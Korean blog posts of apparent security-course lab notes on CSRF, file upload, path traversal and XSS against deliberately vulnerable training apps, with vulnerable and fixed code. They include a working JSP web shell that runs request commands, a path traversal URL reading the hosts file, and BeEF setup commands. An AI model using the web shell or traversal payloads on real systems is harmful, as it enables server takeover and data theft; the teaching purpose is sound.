현재 로그인한 직원 ID와 조회 대상 직원 ID를 확인하는 코드로 변경

3. 결과 확인

[SK shieldus Rookies 16기][취약점 진단] CSRF의 개요와 공격실습

Fri, 22 Dec 2023 00:28:12 GMT

1. CSRF

1.1. 정의

크로스 사이트 요청 위조 Cross-Site Request Forgery 의 약어
서버에서 요청 주체와 요청 절차를 확인하지 않고 요청을 처리하는 경우 Victim의 권한으로 요청이 실행되는 취약점

1.2. 공격원리

1.3. 방어기법

중요 기능에 대해서 요청 주체 재인증, 재인가
- 중요기능 : 데이터 생성/수정/삭제, 중요 데이터 다루는 기능, 송금 기능
- 재인증, 재인가 : 다단계 인증 적용
정상적인 절차에 따른 요청인지 확인 후 요청 처리
- 선행 페이지에서 텍스트 기반의 토큰을 부여하고 처리 페이지에서 토큰을 검증하는 방법
- CAPTCHA 는 요청 과정에 사용자가 참여하도록 만드는 것
  - 자동화된 요청 방지
  - 사용자와의 상호작용(Interaction)을 통한 요청

1.4. CSRF 공격 예시

자동 회원 가입
게시판 자동 글쓰기
광고 배너 클릭

실습문제1 - ChangePassword

beebox > create user 탭 > 회원가입 > 회원가입한 계정으로 로그인 > Cross-Site Request Forgery - ChangePassword

1. 목적

스크립트가 포함된 게시글을 조회한 사용자의 비밀번호를 강제로 변경시키기

패스워드 변경 페이지 확인

패스워드 변경 시도 시 재인증 절차 없이 패스워드가 변경되는 것 확인할 수 있다.

패스워드 변경 요청 주소 확인해보면 정상절차를 검증하는 토큰 값이 포함되어 있지 않다.

패스워드를 변경하는 중요 기능을 구현할 때 요청 주체 및 요청 절차를 확인하지 않고 패스워드를 변경하고 있다. ⇒ CSRF 취약점 존재

로그아웃 후 재로그인 시도 시 기존 패스워드로는 로그인이 불가하고 변경한 패스워드로는 로그인이 가능하다.

자동으로 패스워드 변경을 요청을 발생시키는 코드를 작성하여 게시판에 올려보자.

이렇게 업로드 된 게시물을 다른 사용자가 조회하게 되면 요청하지 않았어도 자동으로 패스워드가 변경된다.

개발자 도구 > Network 탭에서 요청이 전달됐는지 확인할 수 있다.

beebox VM에서 소스 코드를 확인해보자.

$ sudo gedit /var/www/bWAPP/csrf_1.php

패스워드 변경에 필요한 사용자 입력을 받아 서버로 전달하는 부분

   " method="GET">
                                                 
       Current password:
                            
       
        
       # 보안 등급이 낮은 경우 패스워드 변경에 꼭 필요한 값만 입력받는다. (변경할 패스워드)
       New password:
             
              
       Re-type new password:

서버 내부에서 처리

# 패스워드 변경에 필요한 값을 포함하고 있는 요청 파라미터가 존재하는 확인
if(isset($_REQUEST["action"]) && isset($_REQUEST["password_new"]) && isset($_REQUEST["password_conf"]))
{                        
    $password_new = $_REQUEST["password_new"];
    $password_conf = $_REQUEST["password_conf"];      

    # 새 패스워드 값이 없는 경우
    if($password_new == "")
    {        
        $message = "Please enter a new password...";               
    }    
    else
    {
        # 새 패스워드와 새 패스워드 확인의 값이 다른 경우
        if($password_new != $password_conf)
        {
            $message = "The passwords don't match!";       
        }
        else            
        {
            # 패스워드 변경 대상 정보를 추출 = 변경 대상의 ID를 추출 = 로그인한 사용자의 ID를 추출
            $login = $_SESSION["login"];         
            $password_new = mysqli_real_escape_string($link, $password_new);
            $password_new = hash("sha1", $password_new, false);    

            # 보안 등급이 낮은 경우 요청 주체를 확인하지(재인증하지 않고) 요청을 처리
            if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2") 
            {
                $sql = "UPDATE users SET password = '" . $password_new . "' WHERE login = '" . $login . "'";
                $recordset = $link->query($sql);

                if(!$recordset)
                {
                    die("Connect Error: " . $link->error);
                }

                $message = "The password has been changed!";
            }
            else
            {                               
                 # 보안 등급이 높은 경우, 현재 패스워드가 요청 파라미터로 전달되었는 확인
                if(isset($_REQUEST["password_curr"]))
                {                              
                    $password_curr = $_REQUEST["password_curr"];
                    $password_curr = mysqli_real_escape_string($link, $password_curr);
                    $password_curr = hash("sha1", $password_curr, false);                

                    # 현재 로그인한 사용자의 패스워드가 요청 파라미터로 전달된 것과 동일한지 확인
                    $sql = "SELECT password FROM users WHERE login = '" . $login . "' AND password = '" .$password_curr . "'";
                    $recordset = $link->query($sql);             

                    if(!$recordset)
                    {
                        die("Connect Error: " . $link->error);
                    }

                    $row = $recordset->fetch_object();   
                    # 패스워드가 일치하는 경우(=로그인한 사용자의 요청이 맞음) 패스워드를 변경
                    if($row)
                    {                  
                        $sql = "UPDATE users SET password = '" . $password_new . "' WHERE login = '" . $login . "'";

                        $recordset = $link->query($sql);
                        if(!$recordset)
                        {
                            die("Connect Error: " . $link->error);
                        }

                        $message = "The password has been changed!";
                    }
                    else
                    {
                        $message = "The current password is not valid!";
                    }
                }
            }
        } 
    }
}
?>

실습문제2 - 게시판에 form 삽입 및 실행

openeg > 로그인 > 게시판에 스크립트 작성 가능한지 확인

스크립트가 포함되어 있는 게시글 조회 시 스크립트가 실행되는 것을 확인할 수 있다.

아래 코드를 포함한 게시물을 작성한다.


     
     
    
    시중에서 가장 저렴한 대출금리의 상품을 연결해 드립니다. 연락주세요.

작성된 스크립트에서 Submit Query 버튼을 클릭하면 자동으로 게시물이 작성되는 것을 확인할 수 있다.

취약점 종류 : Stored XSS, CSRF
판단 근거
- Stored XSS : 실행 가능한 스크립트 코드를 게시판에 등록하면 게시판 상세 페이지에서 등록하나 스크립트 코드가 실행되므로,
  Stored XSS 취약점이 존재한다.
- CSRF : 정상적인 절차에 따른 요청인지, 요청의 주체가 맞는지 확인하지 않고 등록 처리에 필요한 값 존재 여부만 체크해서 등록 처리하기 때문에 CSRF 취약점이 발생했다.
대응 방안
- Stored XSS : 게시판 저장 페이지에서 입력값을 검증해서 실행 가능한 스크립트 코드가 존재하는 경우, 오류처리 하거나, 제거하거나, 안전한 형태로 변경해서 저장하는 방법이 있고, 게시판 상세 페이지에서 실행 가능한 스크립트 코드를 제거하거나 안전한 형태로 변경해서 출력하는 방법이 있다. 해당 기능을 구현할 때 검증된 라이브러리, 프레임워크를 사용하는 것을 권장한다.
- CSRF : 정상적인 절차에 따른 요청인지를 확인하는 코드를 추가한다.

// BoardController.java
    // 게시판 글쓰기 페이지 요청
    @RequestMapping("/write.do")
    public String boardWrite(@ModelAttribute("BoardModel") BoardModel boardModel, HttpSession session) {
        // (1) 임의의 난수를 발생 시켜서 세션에 저장
        String token = UUID.randomUUID().toString(); // 추가
        session.setAttribute("session_token", token); // 추가
        return "/board/write";
    }


    
        
         

        
        
            제목
            
                
                
                
            
        
        
            내용
            
                
            
        
        
            파일
            
                
                  * 임의로 파일명이 변경될 수 있습니다.

제목
내용
파일	* 임의로 파일명이 변경될 수 있습니다.

// BoardController.java
    // 게시판 글 저장
    @RequestMapping(value = "/write.do", method = RequestMethod.POST)
    public String boardWriteProc(@ModelAttribute("BoardModel") BoardModel boardModel, MultipartHttpServletRequest request, HttpSession session) {
        // (3) 세션에 저장된 토큰 값과 요청 파라미터를 통해 전달된 토큰 값을 비교
        //     일치하면 기존처럼 글 저장을 처리하고, 일치하지 않으면 오류 메시지를 반환
        String stoken = (String)session.getAttribute("session_token");
        String ptoken = request.getParameter("request_token");

        if (ptoken == null || !ptoken.equals(stoken)) {
            session.setAttribute("error_message", "잘못된 접근입니다.");
            return "redirect:list.do";
        }

//list.jsp

Cross-Site Request Forgery (Change Secret)은 BeeBox에서는 해당 실습을 CSRF로 분류하고 있으나 보안기능 결정에 사용되는 부적절한 입력값 취약점으로 보는 것이 맞다.

외부에서 입력도진 값에 의존해서 주요 기능을 처리할 때 발생 외부에서 입력된 값은 제한적으로 사용해야 하며, 반드시 검증 후 사용

실습문제3 - 송금 계좌 변경하기

1. 목표

계좌이체 서비스에서 다른 사람 계좌로 들어갈 금액을 내 계좌로 가져오기

2. 소스코드 확인

GET /bWAPP/csrf_2.php account=123-45678-90&amount=0&action=transfer

3. 문제점

중요 기능임에도 정상적인 절차에 따른 요청인지 확인하지 않고, 요청 주체를 확인하는 로직이 없다.

계좌번호를 변경하면 내가 보내고자 했던 계좌번호가 아닌 엉뚱한 계좌로 송금되는 것을 확인할 수 있다.

[SK shieldus Rookies 16기][취약점 진단] File Upload 취약점 개요 및 공격실습

Thu, 21 Dec 2023 07:49:29 GMT

1. 파일 업로드 취약점 = File Upload

1.1. 정의

파일 업로드 취약점 = 위험한 형식 파일 업로드
파일 업로드 기능이 존재하는 경우, 업로드 하는 파일의 크기와 개수를 제한하지 않고 외부에서 직접 접근이 가능한 경로에 저장되는 경우 발생한다.

1.2. 파일 업로드 기능 존재 확인하는 법

태그와 태그 확인


       :    
    
      :

전송 패킷의 Content-Type 확인

POST /openeg/board/write.do HTTP/1.0
// 요청 본문의 인코딩 방식을 지정 (기본값: x-www-form-urlencoded)
Content-Type: multipart/form-data
// 요청 본문에 포함된 데이터의 크기
Content-Length: 22342
    :

태그의 enctype 속성이란?

폼 데이터가 서버로 제출될 때 해당 데이터가 인코딩 되는 방법을 명시해주는 속성
폼 데이터에 파일 업로드가 포함되는 경우 사용
method 속성값이 POST인 경우에만 사용 가능
요청 패킷에 Content-Type 확인
enctype 속성값 종류*
x-www-form-urlencoded
- enctype 속성의 기본값.
- 서버로 전달하는 값을 URL 인코딩 방식으로 인코딩해서 전송 name=hong&age=23&email=hong%40test.com
multipart/form-data
- 폼 데이터를 멀티파트 형식으로 전송
- 모든 문자를 인코딩 X
- 파일이나 이미지 전송 시 사용
text/plain
- 공백 문자만 + 기호로 변환하고 나머지 문자는 모두 인코딩하지 않고 전송

1.3. 업로드하는 파일의 크기와 개수를 제한하지 않았을 경우 발생하는 문제점

파일이 업로드되는 동안 연결을 독점하므로, 불필요하게 큰 파일을 업로드하여 서버의 연결 자원을 고갈시켜 정상적인 서비스를 방해할 수 있다.
업로드한 파일은 임시 또는 영구적으로 서버에 저장되므로, 불필요한 파일(또는 의미없는 파일)을 업로드해서 서버의 디스크 자원을 고갈시켜 정상적인 서비스를 방해할 수 있다.

1.4. 외부에서 직접 접근이 가능한 경로에 저장되는 경우 발생하는 문제점

WebShell 파일을 업로드 및 실행하여 서버 제어권 탈취

외부에서 직접 접근이 가능한 경로란? Web Root Directory 아래에 위치한 파일

웹 서버가 기준으로 정한 디렉터리 ⇒ Web Root Directory 외부에서 요청이 들어오면 Web Root Directory를 기준으로 한 상대 경로에 위치한 파일을 읽어서 또 실행해서 반환한다.

httpL//www.test.com:80/path/subpath/file

만약 위와 같은 URL이 있다면 www.tesst.com 서버의 80 포트를 사용하는 프로그램이 기준으로 정한 디렉터리가 존재한다. 예를 들어 /var/www/html 을 기준 디렉터리로 저장했다면 URL 상의 리소스는 해당 서버의 /var/www/html/path/subpath/file 로 존재해 /var/www/html/otherdir/otherfile 은 http://www.test.com:80/otherdir/otherfile 로 접근이 가능해진다.

WebShell 파일이란?

일반적으로 Server Side Script 언어를 이용해서 하나의 파일로 구성된 프로그램
Command Injection 공격을 효율적으로 할 수 있도록 만들어진 프로그램

1.5. 예상 피해

서버의 연결 및 디스크 자원을 고갈시켜 정상적인 서비스 방해
서버 제어권 탈취
해당 서버가 악성 코드 유포지로 악용

1.6. 대응방안

업로드 파일의 크기와 개수를 제한
업로드 파일을 외부에서 접근할 수 없는 경로에 저장
업로드 파일 저장 시 외부에서 알 수 없는 형식으로 실행 속성을 제거하고 저장

외부에서 접근할 수 없는 경로란? Web Root Directory 밖

실습문제1 - OS Command 파일 업로드 및 실행

Kali Linux > openeg

1. 게시판에 파일 업로드 취약점이 존재하는 지 확인

openeg > 게시판 > 이미지가 포함된 게시글 작성

2. 소스코드 확인

업로드한 파일이 외부에서 접근 가능한 경로에 원본 파일의 이름으로 저장되고 있다.

3. 파일 종류를 제한하고 있는지 확인

OS Command를 실행 시키는 파일 작성

// OSCommand.jsp
<%@ page import="java.io.*"%>
<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%>



    


    
        
        

        
    
        <%
        // cmd 요청 파라미터의 값을 추출
        String cmd = request.getParameter("cmd"); 
        // 값이 있는 경우 
        if (cmd != null && !"".equals(cmd)) {     
            Process ps = null;
            InputStream is = null;
            InputStreamReader isr = null;
            BufferedReader br = null;
            try {
                // cmd 요청 파라미터의 값을 해당 서버의 쉘에서 실행 후 결과를 반환
                ps = Runtime.getRuntime().exec(cmd); 
                is = ps.getInputStream();                  
                isr = new InputStreamReader(is);
                br = new BufferedReader(isr);
                String line = null;
                while ((line = br.readLine()) != null) {
                    out.println(line);
                }
            } catch (Exception e) {
                System.err.println(e);
            } finally {
                if (br != null) { br.close(); }
                if (isr != null) { isr.close(); }
                if (is != null) { is.close(); }
                if (ps != null) { ps.destroy(); }
            }
        }
    %>

게시판에 OSCommand.jsp 파일 업로드

파일이 업로드된 경로로 이동하면 서버 쉘이 실행된 것을 확인할 수 있다.

4. 취약한 소스 코드를 확인

// BoardController.java
    //  게시판 글저장 처리
    @RequestMapping(value = "/write.do", method = RequestMethod.POST)
    public String boardWriteProc(@ModelAttribute("BoardModel") BoardModel boardModel, MultipartHttpServletRequest request, HttpSession session) {
        // CSRF 방어
        String stoken = (String)session.getAttribute("session_token");
        String ptoken = request.getParameter("request_token");

        if (ptoken == null || !ptoken.equals(stoken)) {
            session.setAttribute("error_message", "잘못된 접근입니다.");
            return "redirect:list.do";
        }

        // 업로드 파일을 저장할 경로를 설정 
        // 웹 루트 디렉터리의 서버 실제 경로 아래에 files 디렉터리를 만들고 그 아래에 파일을 저장
        String uploadPath = session.getServletContext().getRealPath("/") + "files/";
        File dir = new File(uploadPath);
        if (!dir.exists()) {
            dir.mkdir();
        }
        // 요청에서 file 이름의 파라미터를 가져와서 MultipartFile 인스턴스에 저장 ⇐ 파일에 대한 정보와 데이터가 저장
        MultipartFile file = request.getFile("file");
        // 첨부파일이 존재하는 경우 업로드 파일을 저장하는 경로 아래에 원본 파일명으로 저장
        if (file != null && !"".equals(file.getOriginalFilename())) {    
            String fileName = file.getOriginalFilename();
            File uploadFile = new File(uploadPath + fileName);
            // 동일한 파일이 존재하는 경우 날짜시간을 파일명 앞에 추가해서 저장
            if (uploadFile.exists()) {
                fileName = new Date().getTime() + fileName;         
                uploadFile = new File(uploadPath + fileName);
            }
            try {
                // 업로드 파일을 위에서 설정한 경로와 이름으로 저장
                file.transferTo(uploadFile);                 
            } catch (Exception e) {                
                System.out.println("upload error");
            }
            // DB에 파일명을 저장하기 위해서 설정
            boardModel.setFileName(fileName);
        }

        // 게시판 내용에 개행문자를 
 태그로 변경
        String content = boardModel.getContent().replaceAll("\r\n", "
");
        boardModel.setContent(content);

        // DB 저장을 위해서 설정    
        service.writeArticle(boardModel);                        // DB에 설정된 데이터를 저장
        return "redirect:list.do";
    }

File Upload 취약점이 존재
업로드 파일의 크기와 개수를 제한하지 않고, 외부에서 접근 가능한 Web Root Directory 아래에 원본 파일명으로 저장하기 때문에

5. 안전한 소스 코드로 변경

// BoardController.java
//     업로드 가능한 파일 확장자를 정의
    private final String[] allowedFileExtention = { ".jpg", ".jpeg", ".png", ".jfif" };

    //  게시판 글저장 처리
    @RequestMapping(value = "/write.do", method = RequestMethod.POST)
    public String boardWriteProc(@ModelAttribute("BoardModel") BoardModel boardModel, MultipartHttpServletRequest request, HttpSession session) {
        // S: CSRF 방어
        String stoken = (String)session.getAttribute("session_token");
        String ptoken = request.getParameter("request_token");

        if (ptoken == null || !ptoken.equals(stoken)) {
            session.setAttribute("error_message", "잘못된 접근입니다.");
            return "redirect:list.do";
        }
        // E: CSRF 방어

        // #1 업로드 파일을 외부에서 접근할 수 없는 경로에 저장
        // String uploadPath = session.getServletContext().getRealPath("/") + "files/";
        String uploadPath = "c:/upload/files/";
        File dir = new File(uploadPath);
        if (!dir.exists()) {
            dir.mkdir();
        }
        MultipartFile file = request.getFile("file");
        if (file != null && !"".equals(file.getOriginalFilename())) {
            // #2-1 확장자를 비교해서 이미지 파일만 업로드할 수 있도록 제한
            //      "jpg", "jpeg", "png", "jfif"
            // 업로드 파일의 확장자를 추출
            String[] temp = file.getOriginalFilename().split("\\.");
            String extention = temp[temp.length-1];            
            // 확장자로 사용할 수 있는 목록에 업로드 파일의 확장자가 포함되어 있는지 확인
            List list = new ArrayList<>(Arrays.asList(allowedFileExtention));
            if (!list.contains(extention)) {
                session.setAttribute("error_message", "이미지 파일만 업로드 가능합니다.");
                return "redirect:list.do";
            }


            // #2-2 업로드 파일의 크기가 2M 보다 큰 경우 오류 메시지와 함께 list 페이지로 리다이렉트
            if (file.getSize() > 2097152) {
                session.setAttribute("error_message", "2MB 이하의 크기만 첨부할 수 있습니다.");
                return "redirect:list.do";
            }

            // #3 외부에서 알 수 없도록 저장 파일명을 다른게 설정
            String savedFileName = UUID.randomUUID().toString();
            String fileName = file.getOriginalFilename();
            // File uploadFile = new File(uploadPath + fileName);
            File uploadFile = new File(uploadPath + savedFileName);
            /*    중복된 파일명이 생성되지 않으므로 주석 처리
            if (uploadFile.exists()) {
                fileName = new Date().getTime() + fileName;
                uploadFile = new File(uploadPath + fileName);
            }
            */

            try {
                file.transferTo(uploadFile);
            } catch (Exception e) {
                System.out.println("upload error");
            }

            // #4 파일 저장 시 사용한 파일명을 DB에 저장할 수 있도록 설정
            boardModel.setSavedFileName(savedFileName);
            boardModel.setFileName(fileName);
        }
        String content = boardModel.getContent().replaceAll("\r\n", "
");
        boardModel.setContent(content);
        service.writeArticle(boardModel);
        return "redirect:list.do";
    }

6. 변경된 소스 코드 확인

파일이 저장될 디렉토리 생성하기

OS Command 파일 업로드하기

파일 업로드 취약점을 보완하면 업로드 파일이 외부에서 접근할 수 없는 경로에 원본 파일명이 아닌 다른 이름으로 저장되기 때문에 URL 주소를 이용해서는 접근할 수 없음

∴ 다운로드 기능이 필요 = 접근할 수 없는 경로의 파일을 읽어서 응답으로 반환하는 기능

7. 파일 다운로드 기능 만들기

BoardController.java에 이미지 다운로드 기능 구현하기

// BoardController.java
    @RequestMapping("/download.do")
    public void download(HttpServletRequest request, HttpSession session, HttpServletResponse response) {
        // 요청 파라미터로 전달된 게시판 ID를 추출한다.
        int idx = Integer.parseInt(request.getParameter("idx"));
        //저장된 파일이름(savedFileName)을 추출하기 위해 게시판 ID와 일치하는 게시판 정보를 조회한다. 
        BoardModel board = service.getOneArticle(idx);

        if (board == null) {
            return;
        }

        // 원본 파일명 추출한다.
        String filename = board.getFileName();
        //저장에 사용한 파일명을 추출한다.
        String savedFileName = board.getSavedFileName();
        // 파일의 저장 경로 + 저장 파일명 ==> 파일을 열고 읽을 수 있다.
        String filePath = "c:/upload/files/" + savedFileName;

        BufferedOutputStream out = null;
        InputStream in = null;
        try {
            response.setContentType("image/jpeg");
            response.setHeader("Content-Disposition", "inline;filename=" + filename);
            File file = new File(filePath);
            in = new FileInputStream(file);
            out = new BufferedOutputStream(response.getOutputStream());
            int len;
            byte[] buf = new byte[1024];
            while ((len = in.read(buf)) > 0) {
                out.write(buf, 0, len);
            }
        } catch (Exception e) {
            e.printStackTrace();
            System.out.println("파일 전송 에러");
        } finally {
            if (out != null) {
                try {
                    out.close();
                } catch (Exception e) {

                }
            }
            if (in != null) {
                try {
                    in.close();
                } catch (Exception e) {

                }
            }
        }
    }

첨부했던 파일을 URL을 통해서 호출X → 다운로드 기능을 이용해 다운로드 받도록 view.jsp 수정

// view.jsp

  
    
        첨부파일 : 
        
${board.fileName}
        

        
        수정된 첨부파일 보기
        
${board.fileName}

8. 다운로드 기능을 잘못 구현하는 경우

view.jsp


    
                      
           첨부파일 : 
           
${board.fileName}
           


           
           수정된 첨부파일 보기
           
${board.fileName}
           


           
           안전하지 않은 방식으로 수정된 첨부파일 보기
           
${board.fileName}

BoardController.java

// 안전하지 않은 방법으로 이미지 다운로드 기능을 구현
    @RequestMapping("/download2.do")
    public void download2(HttpServletRequest request, HttpSession session, HttpServletResponse response) {
        // 요청 파라미터로 전달된 저장 이미지 이름을 추출
        String savedFileName = request.getParameter("file");

        String filePath = "c:/upload/files/" + savedFileName;

        BufferedOutputStream out = null;
        InputStream in = null;
        try {
            response.setContentType("image/*");
            response.setHeader("Content-Disposition", "inline; filename=" + savedFileName);
            File file = new File(filePath);
            in = new FileInputStream(file);
            out = new BufferedOutputStream(response.getOutputStream());
            int len;
            byte[] buf = new byte[1024];
            while ((len = in.read(buf)) > 0) {
                out.write(buf, 0, len);
            }
        } catch (Exception e) {
            e.printStackTrace();
            System.out.println("파일 전송 에러");
        } finally {
            if (out != null) {
                try {
                    out.close();
                } catch (Exception e) {

                }
            }
            if (in != null) {
                try {
                    in.close();
                } catch (Exception e) {

                }
            }
        }
    }

이미지 다운로드 경로를 아래와 같이 변경 후 브라우저를 통해서 요청 ⇒ 다운로드 받은 파일을 메모장으로 열어보면 해당 서버의 hosts 파일 내용이 제공 http://victim:8080/openeg/board/download2.do?file=../../../../../../../../Windows/System32/drivers/etc/hosts

2. 경로 조작 = Path Traversal

2.1. 정의

Path Traversal or Directory Traversal
외부에서 전달된 값이 서부 내부의 파일을 참조하는데 사용되는 경우 경로를 조작하는 특수문자 등을 포함 여부를 확인하지 않고, 사용하면 제한된 경로를 벗어나 시스템 파일 등에 접근이 가능해지는 취약점이다.

다음은 파일 다운로드 코드의 일부이다.

String filePath = request.getParameter("file");    
File file = new File(filePath);
// 예상 경로 ⇒ download.do?file=c:/upload/files/SAVEDFILENAME

위와 같이 작성 시 요청 파라미터를 통해서 서버 내부의 파일 저장 경로가 노출될 수 있다. 그러므로 파일이 저장된 경로를 외부에서 알 수 없도록 하게 위해서는 아래 코드처럼 외부에서는 파일명만 받아오고, 서버 내부에서 가지고 있는 저장 경로를 결합해서 파일을 오픈해야 한다.

String savedFileName = request.getParameter("file");
String filePath = "c:/upload/files/" + savedFileName

이 방식은 파일 저장 경로는 외부에 노출되지 않으나, 파일명에 경로 조작 문자열 포함 여부를 확인하지 않았기 때문에 원래 접근할 수 없는 (시스템) 경로의 파일을 다운로드 할 수 있는 문제가 발생할 수 있다.

2.2. 방어 기법

외부 입력값을 서버 내부 파일을 참조하는데 사용하는 경우

외부 입력값에 경로 조작 문자열 포함 여부를 확인하고 사용
사용할 수 있는 값을 미리 정의하고 정의된 범위 내의 값만 사용하도록 제한 ⇒ 허용 목록 방식의 제한

∴ 파일 업로드 기능을 안전하게 구현하면 필연적으로 파일 다운로드 기능을 구현해야 하며, 파일 다운로드 기능을 구현할 때는 경로 조작 취약점이 발생하지 않도록 해야 한다.

실습문제2 - 경로 순회

WebGoat (id: webgoat / pw: webgoat) > Access Control Flaws > Bypass a Path Based Access Control Scheme

1. 목적

C:\FullstackLAB\workspace\.metadata\.plugins\org.eclipse.wst.server.core\tmp1\conf\tomcat-users.xml 파일의 내용을 화면에 출력해보기

2. 소스코드 확인

예상 요청 방식 POST attack?Scrren=51&menu=200 HTTP 1.1 File=AccessControlMatrix.html&SUBMIT=View+File

3. BurpSuit로 서버에 AccessControlMatrix.html을 요청하는 패킷 Intercept

File 값으로 .. 와 / 를 사용이 가능한지 확인 후 경로 작성

4. 결과 확인

[SK shieldus Rookies 16기][취약점 진단] XSS의 개요와 공격 실습, BeeF 공격 프레임워크 사용법, SOP, CORS, CSP

Tue, 19 Dec 2023 05:44:39 GMT

XSS와 CSRF 차이점 공격 위치가 다르다. XSS는 사용자의 클라이언트 PC를 공격하고, CSRF는 서버를 공격한다.

http://victim:8080/openeg (id: test / pw :test) http://victim:8080/WebGoat/attack (id: webgoat / pw: webgoat) http://beebox/bWAPP (id: bee / pw: bug)

1. XSS

1.1. 정의

크로스 사이트 스크립트(Cross-Site Scripting : XSS)의 약어
공격자가 전달한 스크립트 코드가 사용자 브라우저를 통해서 실행되는 경우

1.2. 목적

사용자에게 가짜 페이지를 제공, 입력 유도해서 사용자 정보 탈취
사용자 브라우저 또는 PC에 저장된 정보 탈취
사용자 PC 제어권 탈취

1.3. 자동화 툴

Beef(The Browser Exploitation Framework)

1.4. 종류

PortSwigger에서 제공하는 XSS Cheat Sheet

Stored XSS (=Persistent XSS) 악성 스크립트 코드가 서버에 저장되고, 한 번 저장된 스크립트 코드가 불특정 다수의 사용자에게 지속적으로 전달되어 실행될 때 발생된다. 예를 들면 게시물에 악성 스크립트를 포함하여 개제하는 경우 해당 게시물을 조회하는 모든 사용자가 공격받게 된다.
Reflective XSS 입력값이 다음 화면 출력에 그대로 사용되는 경우, 입력값에 스크립트 코드 포함 여부를 확인하지 않고 그대로 화면 출력에 사용하면 입력값으로 전달된 스크립트 코드가 사용자 브라우저에서 실행된다.

DOM Based XSS 개발자가 작성한 자바스크립트 코드의 취약점을 이용한 공격으로 보안이 취약한 웹 페이지에 악성 스크립트가 포함된 URL 주소를 삽입해 사용자가 URL을 클릭하면 악성 스크립트가 실행된다.



  
  DOM Based XSS


  First 바로가기

종료태그가 없는 태그 = 빈 태그

1.5. 대응방안

입력값에 실행 가능한 코드가 포함되어 있는지 확인
- 오류 처리
- 제거 후 사용
- 안전한 문자로 대체해서 사용
출력값에 의도하지 않은 실행 가능한 코드가 포함되어 있는지 확인
- 제거 후 출력
- 안전한 문자로 대체해서 사용 ⇒ HTML 인코딩해서 출력
필터링, 인코딩 작업을 수행할 때는 검증된 로직, 라이브러리, 프레임워크를 사용해서 구현
- 왜? 다양한 입력 패턴이 존재하기 때문에 개인이 수작업으로 방어하는 것은 불가능에 가깝다.
- 대표 라이브러리 : Luxy XSS Filter

실습문제1 - Stored XSS

Kali Linux > http://victim:8080/openeg > 보안코딩테스트 > XSS

// TestController.java
    @RequestMapping(value = "/test/xss_test.do", method = RequestMethod.POST)
    @ResponseBody
    public String testXss(HttpServletRequest request) {
        StringBuffer buffer = new StringBuffer();
        String data = request.getParameter("data");
        buffer.append(data);
        return buffer.toString();
    }

안전한 코드로 변경하는 방법
- Luxy XSS Filter 다운로드
- lucy-xss-1.6.3.jar 라이브러리 다운로드
- 라이브러리 위치: src/main/webapp/WEB-INF/lib
- 룰셋 파일 위치: lucy xss filter/conf/lucy-xss-superset.xml파일 > 프로젝트의 src/main/java 파일로 이동

// TestController.java
@RequestMapping(value = "/test/xss_test.do", method = RequestMethod.POST)
@ResponseBody
public String testXss(HttpServletRequest request) {
    StringBuffer buffer = new StringBuffer();
    String data = request.getParameter("data");

    // (1) HTML 문서에서 태그로 인식하도록 만들어주는 메타문자를 이스케프 처리
    //                                      ~~~~~~~~~~~~~~~~~~
    //                                      HTML 인코딩 => 예) < 문자를 HTML 인코딩 => < or < or <
    /*
    if (data != null) {
        data = data.replaceAll("<", "<");
        data = data.replaceAll(">", ">");
    }
    */

    // (2) 검증된 라이브러리를 사용 => lucy xss filter  
    // - 라이브러리와 룰셋 파일을 프로젝트에 등록(라이브러리 src/main/java)
    // - 인스턴스를 생성
    // - 필터링 
    XssFilter filter = XssFilter.getInstance("lucy-xss-superset.xml");
    data = filter.doFilter(data);

    buffer.append(data);
    return buffer.toString();
}

실습문제2 - Reflective XSS

Kali Linux > http://beebox/bWAPP (id: bee / pw: bug) > xss-Reflected(GET)

서비스 파악 First name과 Last name을 입력하면 Welcome 문구를 출력해주는 서비스

소스코드 분석
- 요청 GET /bWAPP/xss_get.php
- firstname=이름&lastname=성&form=submit

입력창에 스크립트 구문 작성 후 Submit

취약점 존재 확인
- 취약점 유형 : Reflective XSS
- 판단 근거 : 입력값이 화면 출력에 사용되고 있고, 입력값에 스크립트 코드 포함 여부를 확인하지 않고 그대로 출력에 사용하고 있다.
- 대응 방안 : PHP 내장함수 htmlentities()나 htmlspecialchars()를 이용하여 이스케이프 한다.

/var/www/bWAPP/xss_get.php ⇒ 126라인

Please enter both fields...";       
       }else{ 
           echo "Welcome " . xss($firstname) . " " . xss($lastname);   
       }
   }

?>

대응 방안 적용

스크립트가 문자열 그대로 출력되는 것을 확인할 수 있다.

실습문제3 - DOM Based XSS

// TestController.java
    @RequestMapping(value = "/test/xss_test_c.do", method = RequestMethod.POST)
    @ResponseBody
    public String testXssC(HttpServletRequest request) {
        StringBuffer buffer = new StringBuffer();
        String data = request.getParameter("data");
        data = data.replaceAll("<", "<").replaceAll(">", ">");
        buffer.append(data);
        return buffer.toString();
    }

안전한 코드로 변경하는 방법

    @RequestMapping(value = "/test/xss_test.do", method = RequestMethod.POST)
    @ResponseBody
    public String testXss(HttpServletRequest request) {
        StringBuffer buffer = new StringBuffer();
        String data = request.getParameter("data");

        // #1 HTML 문서에서 태그로 인식하도록 만들어주는 메타문자를 이스케프 처리
        //                                      ~~~~~~~~~~~~~~~~~~
        //                                      HTML 인코딩 => 예) < 문자를 HTML 인코딩 => < or < or <
        /*
        if (data != null) {
            data = data.replaceAll("<", "<");
            data = data.replaceAll(">", ">");
        }
        */

        // #2 검증된 라이브러리를 사용 => lucy xss filter  
        // - 라이브러리와 룰셋 파일을 프로젝트에 등록
        // - 인스턴스를 생성
        // - 필터링 
        XssFilter filter = XssFilter.getInstance("lucy-xss-superset.xml");
        data = filter.doFilter(data);

        buffer.append(data);
        return buffer.toString();
    }

만약 luxy로도 필터링이 어려우면 java servlet을 이용하라

2. BeeF 공격 프레임워크 사용법

Kali Linux에서 Beef 설치

$ sudo apt update
$ sudo apt install -y beef-xss

Beef 실행

$ sudo beef-xss

[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user: # Beef 로그인 시 사용할 패스워드 입력
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: 
[*] Example: 

● beef-xss.service - beef-xss
     Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; preset: disabled)                                
     Active: active (running) since Mon 2023-12-18 23:11:31 EST; 5s ago
   Main PID: 759637 (ruby)
      Tasks: 4 (limit: 2249)
